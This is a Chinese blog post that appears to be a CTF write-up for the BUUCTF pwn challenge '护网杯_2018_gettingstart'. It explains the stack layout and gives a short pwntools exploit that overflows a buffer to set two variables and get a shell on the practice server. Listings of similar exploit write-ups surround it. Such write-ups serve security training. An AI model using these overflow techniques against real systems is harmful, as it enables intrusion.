[BUUCTF]PWN——护网杯_2018_gettingstart

最新推荐文章于 2022-04-30 19:36:51 发布
最新推荐文章于 2022-04-30 19:36:51 发布
阅读量686 收藏 2
点赞数 2
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/114973644
版权

护网杯_2018_gettingstart

  1. 例行检查,64位程序,除了RELRO,其他全开
    在这里插入图片描述
  2. 试运行一下,看看大概的情况
    在这里插入图片描述
  3. 64位ida载入
    在这里插入图片描述
    当满足v5=0x7FFFFFFFFFFFFFFFLL并且v6=0.1的时候就能够获取shell,看一下栈布局
    在这里插入图片描述
    确定了偏移,可以在读入buf的时候修改v5和v6的值
    这题没什么难度,v5的值可以直接表示,只是要注意一下0.1在内存中的表示。内存中存放的是数据的补码,浮点型数据的在内存中按照IEEE754 标准存储。有兴趣的师傅可以百度看看怎么算。这边在其他师傅的博客里找到了一个自己算数据在内存中存储的小工具
    在这里插入图片描述

exp

from pwn import *

p=remote("node3.buuoj.cn",27198)

payload='a'*24+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A)
p.sendline(payload)
p.interactive()

在这里插入图片描述

Angel~Yan
关注
专栏目录
2018护网pwn题目task_gettingStart_ktQeERc的writeup
iqiqiya的博客
10-13 1318
下载后   本来想先用checksec 看看有啥保护 但是却发现执行不了(这里不太明白) 看到做出的人那么多  也就没有顾虑了 载入IDA   看到关键字符串  且有/bin/sh     双击进入    发现连续三个跳转之后   就是最终结果 直接F5看伪代码    看到read()之后    这不就是栈溢出嘛  覆盖v7 v8的数据达到条件即可获得shell 栈中顺序...
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 281
BUUCTF 做题练习
BUUCTF(pwn)护网_2018_gettingstart
半岛铁盒的博客
04-04 201
from pwn import * p=remote("node3.buuoj.cn",26480) payload='a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A) p.sendline(payload) p.interactive() 第一步:计算偏移量 为 0x18 第二步 把0.1 转化成在内存中表示的形式
护网_2018_gettingstart
u014377094的博客
01-28 397
栈溢出修改变量来绕过检查
2018护网_fez_签到_gettingstart
uiop_uiop_uiop的博客
10-13 1330
fez  题目给了两个文件: fez.py: import os def xor(a,b): assert len(a)==len(b) c="" for i in range(len(a)): c+=chr(ord(a[i])^ord(b[i])) return c def f(x,k): return xor(xor(x,k)...
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 463
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 363
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4115
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1015
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
Title CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /home/ctf/flag Hint 计算器本身功能完善了吗? 关注协议本身 backdoor了解一下 Attachment calc.rar Tool IDA, pwntools Tag backdoor
护网pwn题目gettingStart
keep coding
10-13 675
拖进IDA 通过main函数的代码显而易见 v7需要等于0x7FFFFFFFFFFFFFF以及v8需要等于0.1 通过buf进行覆盖即可 0.1在内存中的值为4591870180066957722 double a = 0.1; printf("%lld\n", *(long long*)&a); //输出4591870180066957722 编写脚本 from ...
BUUCTF pwn hwb2018_gettingstart
stareforever的博客
02-01 703
查看程序保护 IDA打开查看程序流 读入buf的内容会覆盖v7和v8的值,那么控制v7=0x7FFFFFFFFFFFFFFF和v8=0.1,即可获得shell 这里v8的二进制值可以直接在程序里找到 或者在网站http://www.binaryconvert.com/convert_double.html 输入0.1也可获得 完整ex from pwn import * context(log_level='debug') #io=process("./task_gettingStart_kt
BUUCTF【hwb2018_gettingstart】
weixin_51055545的博客
04-30 1073
想找一道高分题来做一做,想着会很难,但分析了IDA,才发现如此简单. 检查保护: 基本上全开了, IDA分析: 主函数中,满足这个条件就会直接get shell,直接覆盖即可, exp: from pwn import * elf = ELF('./task_gettingStart_ktQeERc') io = remote('node4.buuoj.cn',27594) #io = process('./task_gettingStart_ktQeERc') libc = elf.libc cont
BUUCTF刷题7
m0_51251108的博客
11-09 367
题目:护网_2018_gettingstart:(浮点数内存表示)starctf_2019_babyshell:(有限制的shellcode)picoctf_2018_buffer overflow 0:[BSidesCF 2019]Runit:(shellcode)wdb_2018_3rd_soEasy:(栈迁移)suctf_2018_stack:(栈平衡) 护网_2018_gettingstart:(浮点数内存表示) 参考师傅:护网_2018_gettingstart(浮点数内存表示) · 语雀
BSides Delhi CTF 2018部分pwn题题解
Peanuts
11-03 948
本文后部分首发于先知社区 这个是一个比较基础的国际赛,做完之后的感觉就是其中有些题目很有价值,可以顺便补充一些信号机制、uaf使用的知识。 canary 这个题目比较简单,就是一个普通的stack smash并没有什么特别的,这里直接上解题思路了 解题思路 因为开启了canary,而且flag文件是加载到了bss段之中,所以可以利用_stackchk_failed函数进行一个flag...
2018第四届百越CTF总结-pwn(附带python调用gdb小技巧)
qq_35661990的博客
12-20 1751
这次做了一题逆向和pwn,不过做出的逆向太简单了就不多说了,倒是借着两题最基础的pwn题好好学习了一下ret2lib和ret2plt,以及格式化字符串漏洞。只是写payload的话,照着ctf wiki上的改几个地址就可以了。 Boring game 考察基础的ret2libc和ret2plt,在google上找到一篇把ret2libc基础讲得很好的文章 https://www.shellb...
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 8万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
【LSTM回归预测】基于emd结合长短记忆神经网络lstm实现风速回归预测附Matlab源码.rar
最新发布
10-28
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值